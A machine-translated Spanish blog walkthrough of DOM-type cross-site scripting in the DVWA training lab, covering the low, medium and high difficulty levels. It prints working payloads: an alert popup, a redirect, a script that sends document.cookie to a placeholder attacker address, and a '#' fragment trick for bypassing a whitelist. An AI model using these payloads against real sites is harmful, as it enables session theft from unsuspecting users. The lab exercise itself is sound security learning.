Ataque de scripting entre sitios XSS de DVWA (tipo DOM)

Ataque de scripting entre sitios XSS de DVWA (tipo DOM)

Tipo de objeto de texto DOM, activa xss modificando las etiquetas js (comprensión personal)

clase baja

1. Ventana emergente

Insertar código malicioso:
Incrustar directamente:
Inserte la descripción de la imagen aquíActivado con éxito:
Inserte la descripción de la imagen aquíVerifique el código del front-end y descubra que el código js está insertado en el valor value:
Inserte la descripción de la imagen aquí
Otra forma del
código js:

</option></select><img src='' onerror=alert('xss')>

Use </ option> </ select> para cerrar la etiqueta correspondiente, y luego inserte la ventana emergente del código js:

Inserte la descripción de la imagen aquíVer el código de front-end:
Inserte la descripción de la imagen aquí

2. Redirigir

Incrustar directamente:

<script>window.location = "http://www.baidu.com"</script>

Cierre la etiqueta frontal:

111</option></select><script>window.location = "http://www.baidu.com"</script>

3. Obtén la galleta

Use kali para monitorear:
Inserte la descripción de la imagen aquíinserte código malicioso y active xss:

<script src='http://xxxxx/a.js'></script>

Código de secuencia de comandos:

var img = new Image();
img.src='http://ip地址:端口/cookie.php?cookie='+document.cookie;

Inserte la descripción de la imagen aquíObtenga la cookie con éxito:
Inserte la descripción de la imagen aquí

Intermedio

Verifique el código fuente para ver qué es diferente del nivel bajo; encontré que la etiqueta <script> no se puede usar.
Inserte la descripción de la imagen aquíPuede elegir no usar esta etiqueta o usar #:
Inserte la descripción de la imagen aquícódigo de front-end:
Inserte la descripción de la imagen aquíencontrado que # separa el frente y la parte posterior para activar XSS.

Obtener cookies:
Inserte la descripción de la imagen aquí

Nivel alto

Ver código fuente: verificación de lista blanca.
Inserte la descripción de la imagen aquí
Utilice # para omitir:
Inserte la descripción de la imagen aquí
ataque de scripts de sitios cruzados XSS de DVWA (tipo de almacenamiento) .

Ataque de scripts de sitios cruzados XSS de DVWA (tipo de reflexión) .

Supongo que te gusta

Origin blog.csdn.net/qq_45742511/article/details/113254664
Recomendado
Clasificación